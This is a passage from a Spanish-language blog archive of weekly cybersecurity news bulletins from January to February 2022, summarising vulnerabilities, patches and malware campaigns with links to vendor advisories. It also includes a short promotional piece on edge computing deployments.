fin de moverse lateralmente en la red interna. Los ataques culminan con el descifrado del ejecutable de Cobalt Strike, seguido de su inyección en el proceso legítimo de Microsoft Build Engine (MSBuild), el cual ha sido aprovechado en otras ocasiones por agentes maliciosos para desplegar troyanos de acceso remoto y malware de robo de credenciales. En último lugar, cabe destacar que la versión de Cobalt Strike que se ejecuta en MSBuild.exe viene con configuraciones adicionales para evadir la detección del software de seguridad. Más: https://asec.ahnlab.com/en/31811/
25 de febrero de 2022
Boletín semanal ciberseguridad 12-18 de febrero
Vulnerabilidad crítica en Magento y Adobe Commerce El equipo de seguridad ofensiva de Positive Technologies ha desarrollado una Prueba de Concepto (PoC) para la vulnerabilidad CVE-2022-24086 CVSSv3 9.8, asegurando que permitiría obtener el control del sistema con los permisos del servidor web. No obstante, los investigadores han comunicado que no tienen intención de publicar este exploit ni de manera pública ni de forma privada para otros analistas del sector. Esta vulnerabilidad crítica que afecta a Adobe Commerce y Magento Open Source fue corregida por Adobe el pasado domingo en una actualización de seguridad. El aprovechamiento de este fallo permitiría a un atacante sin autenticar ejecutar código arbitrario de forma remota, aunque cabe mencionar que, pese a no requerir autenticación, sólo puede ser explotada por un atacante con privilegios de administrador. El fallo afecta a las versiones de Magento Open Source y Adobe Commerce 2.4.3-p1 y 2.3.7-p2 y anteriores, a excepción de las versiones previas a la 2.3.3 de Adobe Commerce. Asimismo, durante el día de ayer, Adobe actualizaba este boletín de seguridad para añadir un nuevo fallo, CVE-2022-24087, también del tipo Validación de Entrada Impropia, que cuenta también con una puntuación CVSSv3 de 9.8 y permitiría a un atacante sin autenticar ejecutar código arbitrario de manera remota. Se recomienda instalar los parches de ambas vulnerabilidades críticas lo antes posible. Conoce todos los detalles: https://helpx.adobe.com/security/products/magento/apsb22-12.html 0-day en Chrome siendo explotado activamente Este lunes, Google ha publicado correcciones para ocho fallos de seguridad en el navegador Google Chrome, incluida una vulnerabilidad de criticidad alta que estaría siendo explotada activamente. Esta vulnerabilidad del tipo use-after-free reside en el componente de animación, ha sido identificada como CVE-2022-0609 y, en caso de ser explotada con éxito, permitiría a un atacante ejecutar código arbitrario de manera remota, así como alterar información legítima. Google ha abordado también otras 4 vulnerabilidades con criticidad alta del tipo use-after-free que afectan al gestor de archivos, ANGLE, GPU y Webstore API, así como una vulnerabilidad del tipo heap buffer overflow en Tab Groups y una implementación inapropiada en Gamepad API. Desde Google recomiendan actualizar Google Chrome a la versión 98.0.4758.102 para corregir estos fallos. Más información: https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html Campaña de TA2541 persistente en el tiempo Investigadores de Proofpoint han publicado un nuevo artículo en el que atribuyen al grupo TA2541 una campaña de ataques, persistente en el tiempo y que tendría como objetivo sectores como la aviación, el aeroespacial, transporte, manufactura y defensa, en las regiones de Norteamérica, Europa y Oriente Medio. La actividad de este grupo se remontaría a 2017 y, desde ese año, han utilizado unas TTPs que se han mantenido en el tiempo. El vector de entrada habitual identificado son campañas de phishing en inglés que emplean temáticas relacionadas con la aviación, el transporte o los viajes, en lugar de aprovecharse de temáticas actuales como hacen frecuentemente otros grupos, aunque en alguna ocasión también han mezclado sus temáticas habituales con otras actuales como el COVID-19. En estos correos se incluyen adjuntos que descargan ya los payloads de distintos RATS, fundamentalmente familias que se pueden adquirir de forma sencilla en foros de cibercrimen, destacando por encima del resto AsyncRAT, NetWire y WSH RAT. En los últimos tiempos, el grupo habría incorporado una mejora en sus campañas y ya no estaría enviando los payloads en documentos adjuntos, sino en links incluidos en los correos que conectan con servicios en la nube. Descubre todos los detalles: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight Información clasificada de Estados Unidos exfiltrada por actores rusos La CISA ha publicado un aviso de seguridad donde alertan de una campaña de ciberespionaje que se remontaría al menos a enero de 2020. En concreto, exponen que actores amenaza de procedencia rusa habrían comprometido y exfiltrado información de contratistas de defensa autorizados por Estados Unidos (CDC), entidades privadas que tienen autorización para poder acceder a información altamente sensible con el fin de poder licitar contratos, acceder a información de las áreas de inteligencia, armamentística, aeronaves, informática, entre otras. Entre las técnicas utilizadas como vector de entrada, los atacantes habrían utilizado campañas de spearphishing, recolección de credenciales, técnicas de fuerza bruta, password spraying o la explotación de vulnerabilidades. Una vez comprometidas las empresas, los atacantes habrían conseguido establecer persistencia en alguna de ellas durante, al menos, seis meses, permitiendo así a Rusia conseguir información estratégica con la que habría podido establecer prioridades militares, planes estratégicos, además de acelerar desarrollos de software, entre otros. Toda la info: https://www.cisa.gov/uscert/ncas/alerts/aa22-047a
18 de febrero de 2022
Boletín semanal ciberseguridad 5 - 11 de febrero
Microsoft deshabilita macros y MSIX para evitar la distribución de malware Microsoft se ha movilizado activamente contra los múltiples ataques de malware que utilizan algunas de sus tecnologías como vector de entrada. En concreto, los productos afectados son el paquete Office y los instaladores de la aplicación MSIX que permite a desarrolladores distribuir aplicaciones para diferentes plataformas. En el caso de Office, la compañía va a deshabilitar las macros de Visual Basic para aplicaciones (VBA) de forma predeterminada en todos sus productos, incluidos Word, Excel, PowerPoint, Access y Visio, para documentos descargados de la web, si bien se podrán habilitar de forma voluntaria por parte del usuario. Según la propia publicación de Microsoft, habilitar las macros en un archivo de Office permite a los actores amenaza entregar cargas maliciosas, implementar malware, comprometer cuentas, exfiltrar información e incluso obtener acceso remoto a los sistemas objetivo. Esta medida llega apenas un mes después de que el fabricante de Windows deshabilitara por defecto las macros de Excel 4.0 (XLM), otra función de la que se abusa mucho para distribuir malware. Referente a los instaladores de la aplicación MSIX, Microsoft ha anunciado que deshabilitará temporalmente el controlador de protocolo MSIX ms-appinstaller en Windows tras tener evidencias de la explotación activa de la vulnerabilidad CVE-2021-43890, la cual permite la instalación de aplicaciones no autorizadas y se estaría utilizando para entregar malware como Emotet, TrickBot y Bazaloader. Este movimiento significa que, hasta que Microsoft no solucione el error por completo, App Installer no podrá instalar una aplicación directamente desde un servidor web, por lo que los usuarios primero deberán descargar la aplicación en su dispositivo y luego instalar el paquete con el instalador de la aplicación. Más información: https://docs.microsoft.com/es-es/DeployOffice/security/internet-macros-blocked Posible exfiltración de información por vulnerabilidad en Argo CD Investigadores de Apiiro han dado a conocer una vulnerabilidad en Argo CD, herramienta ampliamente utilizada para el despliegue de aplicaciones en Kubernetes, que podría ser explotada por atacantes con el fin de obtener información sensible de diferentes organizaciones, especialmente contraseñas y API Keys. La vulnerabilidad ha sido catalogada con el identificador CVE-2022-24348 – 7.7 CVSSv3, y consiste en un fallo de cruce de directorios (Path-Traversal) que podría conducir a la elevación de privilegios, revelación de información y ataques de movimiento lateral. Su explotación se consigue mediante la carga de un archivo YAML especialmente diseñado para Kubernetes Helm Chart en el sistema objetivo, siempre y cuando se tenga permiso para crear y actualizar aplicaciones y se conozca la ruta entera de un archivo que contenga un YAML válido. Por su parte Argo CD publicó su versión 2.3.0-rc4 el pasado viernes, apenas 5 días después de que los investigadores de Apiiro les alertaran de la existencia del fallo. Todos los detalles: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Vulnerabilidades críticas en productos SAP El SAP ha publicado su boletín de seguridad de febrero donde emite 22 actualizaciones importantes, entre las que incluyen soluciones para el impacto producido por Log4j, además de tres vulnerabilidades críticas de corrupción de memoria que afectan a Internet Communication Manager (ICM), un componente central de las aplicaciones comerciales de SAP. Estos tres últimos fallos fueron descubiertos por equipo de respuesta de seguridad de productos de SAP, en colaboración con los laboratorios de investigación de Onapsis, quienes las han denominado como ICMAD" (Internet Communication Manager Advanced Desync). La vulnerabilidad más crítica ya se encuentra parcheada en la nota de seguridad de SAP 3123396 , identificada con el CVE-2022-22536 y con un CVSSv3 de 10.0, permitiría a un atacante no autenticado anteponer la solicitud de una víctima con datos arbitrarios y, por lo tanto, ejecutar funciones haciéndose pasar por la víctima. Los dos errores restantes también han sido parcheados por SAP en su nota de seguridad 3123427 y corresponden al CVE-2022-22532 y CVE-2022-22533 con CVSSv3 de 8.0 y 7.5 respectivamente. Ambas también serían explotables por un atacante remoto no autenticado, si bien solo afectan a las aplicaciones de SAP que se ejecutan en SAP NetWeaver AS Java. Cabe destacar que la explotación exitosa de estas vulnerabilidades podría producir impactos severos como: el robo de información confidencial, ransomware y la interrupción de los procesos de negocio y operaciones. SAP recomienda aplicar a la mayor brevedad las actualizaciones de seguridad de febrero de 2022 de SAP , así como hacer uso de la herramienta de código abierto suministrada por Onapsis que identifica si un sistema es vulnerable y necesita parches. Descubre más: https://onapsis.com/blog/sap-security-patch-day-february-2022-severe-http-smuggling-vulnerabilities-sap-netweaver Actualizaciones de seguridad de Microsoft Microsoft ha corregido una vulnerabilidad en el antivirus Microsoft Defender en Windows, que permitía a los atacantes distribuir y ejecutar payloads pasando desapercibidos al motor de detección de malware. El fallo se debe a una configuración poco estricta de una clave de registro que contiene la lista de ubicaciones excluidas del análisis de Microsoft Defender que era visible para todos los usuarios. Tras la remediación esto es visible únicamente para usuarios con privilegios de administrador. Este error de seguridad afectaba a las últimas versiones de Windows 10, y habría sido corregido con las últimas actualizaciones de seguridad de Microsoft de febrero. Asimismo, cabe destacar que Microsoft está procediendo a la eliminación de la herramienta de comandos Windows Management Instrumentation (WMIC), wmic.exe, en el portal de desarrollo de las últimas versiones de Windows 11, a favor de Powershell. La eliminación únicamente afectaría a la herramienta de comandos, por lo que WMI no se ve afectado. WMI ha sido ampliamente aprovechada por actores maliciosos, llegando a considerarse un LOLBin (living-off-the-land binaries). Al eliminar la utilidad WMIC, múltiples ataques y malware dejarán de funcionar correctamente, ya que no podrán ejecutar algunos comandos necesarios para llevar a cabo sus operaciones, aunque es posible que los atacantes sustituyan WMIC por nuevos métodos. Toda la info: https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-defender-flaw-letting-hackers-bypass-antivirus-scans/ Cibercriminales aprovechan la utilidad Regsvr32 de Windows para distribuir malware Investigadores de Investigadores de Uptycs han analizado una nueva campaña en la que actores maliciosos estarían incrementando el abuso de un LOLBin de Windows conocido como Regsvr32 para propagar malware. Los LOLBins son utilidades legítimas y nativas utilizadas habitualmente en entornos informáticos que los ciberdelincuentes aprovechan para evadir la detección mezclándose con los patrones de tráfico normales. En este caso, Regsvr32 es una utilidad firmada por Microsoft en Windows que permite a los usuarios gestionar librerías de código y registrar archivos DLL añadiendo información al directorio central (registro) para que pueda ser utilizado por Windows y compartido entre programas. Según Uptycs, se estaría abusando de esta utilidad a través de una técnica conocida como Squiblydoo, donde Regsvr32 se utiliza para ejecutar DLLs mediante scriptlets COM que no realizan ningún cambio en el registro. La investigación añade que el uso malicioso de esta utilidad se ha visto incrementado últimamente, principalmente en el registro de archivos .OCX alojados en diversos documentos maliciosos de Microsoft Office. Desde Uptycs han analizado hasta 500 muestras de malware que se estarían distribuyendo, algunas de ellas pertenecientes a Qbot y Lokibot. Más detalles: https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents
11 de febrero de 2022
Edge Computing, 3 historias de éxito
El pasado año 2021 fue un punto de inflexión para la llegada del Edge Computing a nuestras vidas. Telediarios, prensa escrita, redes sociales, charlas entre amigos... Este término no escapaba de ninguno de nuestro ámbitos porque todos queríamos conocer realmente qué era el Edge Computing. Ahora que sabemos en qué consiste, nos preguntamos cómo, a través de qué proyectos, se está llevando a cabo. ¿Qué casos de uso demandan ya esta tecnología? Para descubrirlo, nada mejor que conocer los casos de éxito de Telefónica Tech en este viaje que culminará con la llegada del 5G “de verdad”, el 5G SA (StandAlone), que traerá nuevas capacidades. Navantia Navantia, empresa líder en la fabricación de buques de alta tecnología, ha encontrado en Telefónica al mejor compañero de viaje en el camino a su transformación digital. En este proyecto, se han definido 3 casos de uso de 5G y Edge Computing aplicados a los procesos de reparación y construcción de buques: 5G y Edge Computing para la asistencia en remoto 5G y Edge Computing para el procesamiento en tiempo real del escaneado 3D 5G y realidad aumentada para la construcción de buques Descubre todo sobre este caso de éxito en este vídeo: APM Terminals APM Terminals, una de los mayores operadores en diseño y operaciones de puertos, terminales marítimos y terrestres en todo el mundo, se suma a esta lista de casos de éxito de Edge Computing gracias a su proyecto piloto con Telefónica. Como su partner tecnológico, Telefónica desarrolla, en la terminal de contenedores de APM Terminals en el puerto de Barcelona, una prueba piloto para mejorar la seguridad en la terminal, mediante una combinación de tecnología 5G, Edge Computing y C-V2X. Aquí encontramos 2 casos de uso: Geolocalización y posicionamiento virtual de objetos fijos Geolocalización de elementos en movimiento Conoce más sobre este caso de uso en el siguiente vídeo: IE University El Edge Computing ha llegado también a las aulas y el mejor ejemplo de ello es el caso de éxito del IE University. Junto a Telefónica y Nokia, este reconocido centro de enseñanza ha desarrollado una experiencia inmersiva en su Campus de Segovia, gracias a la aplicación de 5G y Edge Computing. Se trata de clases virtuales inmersivas donde los alumnos aprenden en streaming y desde sus propios dispositivos. En este caso de uso, al 5G y Edge Computing se suma un tercer elemento clave, la Realidad Virtual. Si quiere conocer cómo es posible y el papel de cada uno de estos elementos para conseguir que esta experiencia pionera sea una realidad, dale al play:
10 de febrero de 2022
Boletín semanal ciberseguridad 22-28 de enero
Nuevas vulnerabilidades en Linux Recientemente se han dado a conocer dos nuevas vulnerabilidades de riesgo algo que estarían afectando a sistemas Linux, y que, de ser explotadas podrían permitir escalar privilegios en el sistema vulnerable. · CVE-2021-4034 (PwnKit): Investigadores de Qualys han descubierto un fallo de corrupción de memoria, que reside en el programa pkexec de polkit y podría permitir a un atacante local escalar privilegios en un sistema vulnerable, pudiendo llegar incluso a privilegios de root. Horas después de la publicación del artículo de Qualys, se hacía pública la primera prueba de concepto (PoC) que permitiría el aprovechamiento de este fallo. Desde Qualys recomiendan aplicar los parches disponibles que los autores de Polkit han publicado en Gitlab. · CVE-2022-0185: Vulnerabilidad de desbordamiento de buffer, que reside en el kernel de Linux y podría permitir a un atacante escapar de los contendedores de Kubernetes y tomar el control del nodo, teniendo como requisito tener habilitado el privilegio CAP_SYS_ADMIN. Los investigadores apuntan que la explotación de este fallo es sencilla, por lo que recomiendan actualizar a la mayor brevedad posible ya que, según ha revelado Crusaders of Rust (CoR), equipo que descubrió el fallo, publicarán el código de explotación en las próximas semanas en su repositorio de Github. Toda la info aquí Revocación de certificados SSL/TLS de Let's Encrypt por error de implementación Let's Encrypt ha anunciado en un comunicado que el viernes 28 de enero va a revocar ciertos certificados SSL/TLS debido a dos irregularidades en la implementación del método de validación. Según exponen, esto solo afecta a los certificados que fueron emitidos y validados mediante el reto TLS-ALPN-01 antes del día 26 de febrero las 00:48 UTC, momento en el que el error de implementación fue corregido. Además, indican que esto solo afectará a menos del 1% de los certificados. Desde Let's Encrypt comunicarán a los usuarios afectados las pautas que deberán seguir para la renovación de estos. Cabe destacar que no es la primera vez que Let's Encrypt se enfrenta a un problema de este tipo, pues en octubre de 2021 expiraron los certificados raíz DST Root CA X3. Más info Campaña de espionaje empleando OneDrive como C2 Investigadores de Trellix han publicado los detalles de una campaña de espionaje en múltiples fases que tendría como objetivos oficiales gubernamentales de alto rango y trabajadores del sector de la defensa en Asia occidental. El inicio de la campaña se fecha en octubre, pero la preparación de la infraestructura podría remontarse al mes de junio. El vector de entrada sería un documento de Excel, posiblemente enviado por correo electrónico, que explota una vulnerabilidad de ejecución remota de código en MSHTML (CVE-2021-40444), corregida por Microsoft en su boletín de actualizaciones de septiembre. Esta explotación permite el despliegue de un malware conocido como Graphite, que emplea la API de Microsoft Graph para poder utilizar OneDrive como servidor de Command & Control. Una vez establecida la conexión con el C2 se descarga finalmente Empire, un framework de post-explotación open-source muy utilizado con fines ilícitos. Debido a las múltiples etapas de la cadena de infección, que facilitan la evasión, además del empleo de nuevas técnicas como el uso de OneDrive como C2 con el que consiguen que todas las conexiones se realizan en dominios legítimos de Microsoft, estamos ante una campaña de alta sofisticación. Atendiendo a los objetivos, los investigadores apuntan a una posible atribución a la APT28 (aka Sofacy, Strontium, Fancy Bear o Sednit) de procedencia rusa. Todos los detalles Apple corrige nuevo 0-day aprovechado para vulnerar dispositivos iOS Apple ha publicado nuevas actualizaciones de seguridad para iOS 15.3 y iPadOS 15.3, así como para macOS Monterey 12.2, en las que ha corregido dos vulnerabilidades 0-day. · El primero de los fallos, denominado CVE-2022-22587, se trata de un fallo de corrupción de memoria en el IOMobileFrameBuffer que afecta a iOS, iPadOS y macOS Monterey. La explotación exitosa de esta vulnerabilidad podría permitir la ejecución de código arbitrario con privilegios del kernel en los dispositivos comprometidos. Desde Apple destacan que fallo está siendo activamente explotado. · El segundo 0-day, es un fallo en Safari WebKit en iOS y iPadOS que permitiría a los sitios web rastrear la actividad de navegación y la identidad de usuarios en tiempo real. Esta vulnerabilidad, clasificada como CVE-2022-22594, fue descubierta por primera vez por Martin Bajanik de FingerprintJS el pasado 28 de noviembre, pero no fue publicada hasta el 14 de enero, siendo corregida en esta actualización. Conoce más detalles aquí Trickbot refuerza sus protecciones para evadir detección y análisis Investigadores de IBM Trusteer han analizado campañas recientes del malware Trickbot, en las que los operadores detrás de este troyano han añadido capas de protección adicional a sus inyecciones para evitar que sean analizadas y detectadas. Estas inyecciones de código son utilizadas en tiempo real cuando un usuario con un dispositivo infectado intenta acceder a su cuenta bancaria, las inyecciones están diseñadas para interceptar y modificar la información que sale del navegador antes de que llegue al servidor del banco. La mayoría de las muestras en las que se han detectado estas nuevas capacidades han sido aplicadas en casos de fraude bancario, una de las principales actividades de Trickbot. Entre las actualizaciones implementadas se incluye un nuevo mecanismo de inyección del lado del servidor, comunicaciones cifradas con el C2 (Command&Control), una función anti-debugging y nuevas formas de ofuscar y ocultar el código inyectado. Por otro lado, investigadores de seguridad han reportado que los operadores de Emotet, software malicioso que previamente infecta el dispositivo para en una segunda fase distribuir malware como Trickbot, también han mejorado sus técnicas de evasión mediante el uso de direcciones IP hexadecimales y octales, estarían ocupando el mismo proveedor de Webshells que TR con Qakbot o Squirrelwaffle, identificando hasta 138 sitios comprometidos por este malware. Descubre más aquí
28 de enero de 2022
Boletín semanal ciberseguridad 15-21 de enero
Campaña de ciberataques contra objetivos ucranianos El equipo de Microsoft Threat Intelligence Center ha estado analizando la sucesión de ciberataques perpetrados contra organizaciones ucranianas que se lleva produciendo desde el pasado 13 de enero y que habría afectado hasta, al menos, 15 instituciones del gobierno como el Ministerio de Asuntos Exteriores o Defensa. Según los investigadores, este número podría verse incrementado próximamente. En cuanto a la campaña en sí, Microsoft advierte que se habría utilizado una nueva familia de malware denominado “WhisperGate”, software malicioso cuyo objetivo es destruir y borrar los datos del dispositivo de la víctima enmascarado en forma de ransomware. “WhisperGate” estaría compuesto por dos ejecutables: “stage1.exe”, encargado de sobrescribir el “Master Boot Record” del disco duro para mostrar una nota de rescate, cuyas características indican que se trata de un falso ransomware que no facilita clave de descifrado, y “stage2.exe” que se ejecuta simultáneamente y descarga un malware que destruye datos mediante la sobreescritura de los archivos con datos estáticos. El periodista Kim Zetter ha indicado que el vector de entrada utilizado por los actores maliciosos habría sido la explotación de la vulnerabilidad CVE-2021-32648 y CVSSv3 9.1 en octobercms. Consecuentemente, según agencias de ciberseguridad ucranianas, los actores explotaron también la vulnerabilidad Log4Shell y se reportaron ataques DDoS en contra de su infraestructura. Asimismo, la Agencia de Ciberseguridad y Seguridad de las Infraestructuras de Estados Unidos (CISA) ha realizado un comunicado en el que advierte a las organizaciones sobre las potenciales amenazas críticas que podrían tener lugar tras los recientes ciberataques dirigidos a entidades públicas y privadas en Ucrania. Desde Microsoft indican que no se ha podido atribuir los ataques a ningún actor amenaza en concreto, por ello han denominado estas acciones como DEV-0586. Cabe destacar que, tal como indican las autoridades ucranianas, debido a la escalada de tensiones entre el gobierno ucraniano y ruso, se considera que esta campaña de ataques tiene como fin sembrar el caos en Ucrania por parte de Rusia. Más información: https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ Fallo en Safari podría revelar datos de usuario Investigadores de seguridad de FingerprintJS han revelado un error grave en la implementación de la API IndexedDB de Safari 15 que podría permitir a cualquier sitio web rastrear la actividad del usuario en Internet, pudiendo incluso revelar su identidad. IndexedDB es una API del navegador diseñada para albergar cantidades significativas de datos del lado de cliente, la cual sigue la política “same-origin”; un mecanismo de seguridad que restringe cómo los documentos o scripts cargados desde un origen pueden interactuar con otros recursos. Los investigadores han descubierto que en Safari 15 en macOS, y en todos los navegadores en iOS y iPadOS 15, la API de IndexedDB estaría violando la política “same-origin”. Esto estaría provocando que, cada vez que un sitio web interactúa con una base de datos, se cree una nueva base de datos (vacía) con el mismo nombre en todos los demás marcos, pestañas y ventanas activos dentro de la misma sesión del navegador, haciendo que otros sitios web puedan ver esta información. Desde FingerprintJS han creado una prueba de concepto que se puede probar desde un navegador Safari 15 o superior en Mac, iPhone o iPad. Asimismo, FingerprintJS señala que informaron del error a Apple el 28 de noviembre, pero que aún no ha sido resuelto. Conoce todos los detalles: https://fingerprintjs.com/blog/indexeddb-api-browser-vulnerability-safari-15/ Microsoft publica actualizaciones de emergencia para Windows Tras haberse detectado una serie de problemas causados por las actualizaciones para Windows emitidas durante el último Boletín de Seguridad de enero, Microsoft lanzó de manera extraordinaria (OOB) nuevas actualizaciones y correcciones de emergencia para algunas versiones de Windows 10 y Windows Server. En concreto, diferentes informes reportados por administradores de sistemas señalan que, tras implementar los últimos parches de Microsoft, se han registrado problemas de conexión en redes VPN L2TP, los controladores de dominio sufren reinicios espontáneos, Hyper-V ya no se inicia en los servidores de Windows y existen problemas de acceso a los volúmenes de Windows Resilient File System (ReFS). La afectación de las correcciones es amplia ya que abarca diferentes versiones de Windows Server 2022, 2012 y 2008 y Windows 7, 10 y 11. Según Microsoft, todas las actualizaciones están disponibles para su descarga en el Catálogo de actualizaciones de Microsoft y algunas de ellas también se pueden instalar directamente a través de Windows Update como actualizaciones opcionales. En caso de no ser posible su implementación, se recomienda eliminar las actualizaciones KB5009624, KB5009557, KB5009555, KB5009566 y KB5009543, si bien se debe tener en cuenta que se estarían eliminando también correcciones válidas para las últimas vulnerabilidades parcheadas por Microsoft. Toda la info: https://docs.microsoft.com/en-us/windows/release-health/windows-message-center Fallo de seguridad en Cisco permite a los atacantes conseguir privilegios de root Cisco ha lanzado la versión 21.25.4 de Cisco Redundancy Configuration (RCM) para el software StarOS, donde corrige varios fallos de seguridad. La vulnerabilidad más destacada es la identificada como CVE-2022-20649 CVSSv3 9.0, un fallo crítico que permite a atacantes no autenticados ejecutar código remoto con privilegios de root en los dispositivos que utilicen software vulnerable. El origen de la vulnerabilidad estaría en que el modo debug ha sido habilitado de manera incorrecta para diferentes servicios específicos. Para su explotación, los atacantes no tienen por qué estar autenticados, pero si deben conseguir acceso a los dispositivos, por lo que en un primer momento deberían realizar un reconocimiento detallado para descubrir cuales son los servicios vulnerables. Por el momento no se tiene constancia de que la vulnerabilidad esté siendo aprovechada. De forma adicional, Cisco ha parcheado también otra vulnerabilidad de criticidad media CVE-2022-20648 CVSSv3 5.3 de divulgación de información. Más info: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rcm-vuls-7cS3Nuq Google corrige fallos en Chrome Google ha publicado un aviso de seguridad donde corrige 26 vulnerabilidades que estarían afectando a su navegador Chrome. De entre los fallos, destaca una vulnerabilidad crítica que ha sido catalogada con el identificador CVE-2022-0289 y fue descubierta el pasado 5 de enero por el investigador Sergei Glazunov. Esta vulnerabilidad reside en el servicio de Google Safe Browsing encargado de alertar a los usuarios de que están accediendo a un sitio web que podría tener algún riesgo asociado. De ser aprovechada, esta vulnerabilidad podría permitir la ejecución remota de código. El resto de vulnerabilidades corregidas han sido clasificadas, en su mayoría, con severidad alta, siendo tan solo 5 de riesgo medio. Desde Google recomiendan actualizar a la versión 97.0.4692.99, donde estos fallos se verían solventados. Más detalles: https://chromereleases.googleblog.com/2022/01/stable-channel-update-for-desktop_19.html
21 de enero de 2022
Boletín semanal ciberseguridad 8-14 de enero
Boletín de seguridad de Microsoft Microsoft ha publicado su boletín de seguridad de enero donde ha corregido un total de 97 fallos entre los que se encontraban 6 vulnerabilidades 0-day y 9 errores clasificados como críticos. Atendiendo a los 0-day, no se habría detectado explotación activa de estos, pero cabe destacar que varios disponen de pruebas de concepto públicos, por lo que es probable su explotación se produzca a corto plazo. En referencia a los fallos de seguridad clasificados como críticos destaca la CVE-2022-21907 (CVSS 9.8), que afecta a las últimas versiones de Windows en sus versiones de escritorio y servidor. Se trata de una vulnerabilidad en la pila de protocolo HTTP, cuya explotación resultaría en ejecución remota de código y que ha sido etiquetado como “wormable”. El otro fallo que reseñar es otra ejecución remota de código en este caso en Microsoft Office (CVE-2022-21840 CVSS 8.8), parcheado para las versiones de Windows, pero aún no para dispositivos macOS. Como ocurría con los 0-days, según Microsoft tampoco se ha detectado explotación para estas dos vulnerabilidades. Más info: https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan Nueva vulnerabilidad en JNDI en la consola de la base de datos H2 Investigadores de JFrog han descubierto una vulnerabilidad crítica de ejecución remota de código no autenticada en la consola de la base de datos H2, que comparte su origen con la vulnerabilidad Log4Shell (JNDI remote class loading) y que ha recibido el identificador CVE-2021-42392. H2 es una base de datos Java SQL de código abierto muy popular y ampliamente utilizada en distintos proyectos. A pesar de tratarse de una vulnerabilidad crítica y de compartir características con Log4Shell, los investigadores indican que su impacto es menor por varios motivos. En primer lugar, este fallo tiene un impacto directo ya que el servidor que procesa la solicitud inicial es el mismo que se ve afectado por el fallo, por lo que es más sencillo detectar los servidores vulnerables. En segundo lugar, la configuración predeterminada de H2 es segura, a diferencia de lo que ocurría con Log4Shell donde las configuraciones predeterminadas eran vulnerables. Y finalmente, muchos proveedores emplean la base de datos H2 pero no la consola, de forma que, aunque existen vectores para explotar el fallo más allá de la consola, estos otros vectores dependen del contexto y es menos posible que se expongan a ataques remotos. A pesar de que se atribuye un menor riesgo a este nuevo fallo que a Log4Shell, los investigadores advierten que para todos aquellos que ejecuten una consola H2 expuesta a la LAN, el fallo es crítico y deben actualizar a la versión 2.0.206 de forma urgente. Asimismo, desde la firma han compartido indicaciones a los administradores de red para que puedan comprobar si son vulnerables a este nuevo fallo. Todos los detalles: https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/ Cinco nuevos fallos de tipo URL parsing confusión Investigadores de Team82 y Snyk han publicado un artículo de investigación en el que han estudiado en profundidad cómo distintas librerías analizan las URLs, y cómo estas diferencias en la forma de analizarlas pueden ser aprovechadas por los atacantes; es decir, han analizado fallos de tipo URL parsing confusion. En total han analizado 16 librerías de análisis de URL (Uniform Resource Locator) distintas y se han detectado cinco clases de inconsistencia presentes en algunas de ellas, que podrían ser explotadas para provocar condiciones de denegación de servicio, exposición de información o incluso, bajo ciertas circunstancias, ejecución remota de código. Las cinco inconsistencias observadas son: confusión de esquemas (scheme confusion), confusión de barras (slashes confusion), confusión de barras invertidas (backslash confusion), confusión de datos codificados en URL (URL encoded data confusion) y combinación de esquemas (scheme mixup). Además de la identificación de estas inconsistencias, apuntan a la detección de ocho vulnerabilidades que afectan directamente a distintos frameworks o incluso lenguajes de programación y que ya han sido parcheadas excepto en algunas versiones fuera de soporte de Flask: Flask-security (Python, CVE-2021-23385), Flask-security-too (Python, CVE-2021-32618), Flask-User (Python, CVE-2021-23401), Flask-unchained (Python, CVE-2021-23393), Belledonne’s SIP Stack (C, CVE-2021-33056), Video.js (JavaScript, CVE-2021-23414), Nagios XI (PHP, CVE-2021-37352) y Clearance (Ruby, CVE-2021-23435). En su estudio, otorgan una alta relevancia a este tipo de errores en el análisis de las URLs utilizando Log4Shell como ejemplo para ello, puesto que el bypass a la corrección inicial de Apache del fallo se logró conseguir gracias a la presencia de dos analizadores distintos de URL dentro del proceso de búsqueda JNDI, cada uno de los cuales analizaba de una forma. Para saber más: https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/ MuddyWater: vinculación a Irán y aspectos técnicos La Cyber National Mission Force (CNMF) del comando de ciberseguridad de Estados Unidos, ha publicado una nota donde vincula a la APT conocida como MuddyWater con el Ministerio de Inteligencia y Seguridad de Irán (MOIS) y detalla algunos aspectos técnicos que se han podido asociar al grupo. MuddyWater fue identificado por primera vez en el año 2017, con objetivos localizados, principalmente, en las regiones de Oriente Medio, Europa y Norte América, y en los sectores de telecomunicaciones, gubernamentales e industria petrolera. En su publicación, se identifican algunas herramientas de código abierto utilizadas por este actor malicioso, entre las que se encuentran variantes de PowGoop, muestras de la puerta trasera Mori o archivos DLL de carga lateral para engañar a los programas legítimos con el fin de que ejecuten malware. Toda la info: https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/ Vulnerabilidades 0-day detectadas en AWS CloudFormation y AWS Glue Los investigadores de seguridad de Orca Security han detectado dos vulnerabilidades 0-day en diferentes servicios de Amazon Web Services (AWS). El primero de los fallos se encontraba en el servicio AWS CloudFormation y consistía en una vulnerabilidad XXE (XML External Entity), la cual permitía a los agentes amenaza divulgar archivos confidenciales ubicados en la máquina de servicio vulnerable, así como la divulgación de credenciales de servicios internos de la infraestructura de AWS. La segunda vulnerabilidad descubierta, afectaba al servicio AWS Glue, la cual procedía de una característica explotable que permitía la obtención de las credenciales necesarias para tener acceso a la API del servicio interno, pudiendo obtener permisos de administrador. El portavoz de AWS aseguró que no se han visto afectados los datos de ninguno de los clientes debido a las vulnerabilidades de ambos servicios. Cabe destacar que ambas vulnerabilidades fueron corregidas por el equipo de seguridad de AWS tras su comunicación por parte de los investigadores. Fuente: https://orca.security/resources/blog/aws-glue-vulnerability/
14 de enero de 2022
Boletín semanal ciberseguridad 1-7 de enero
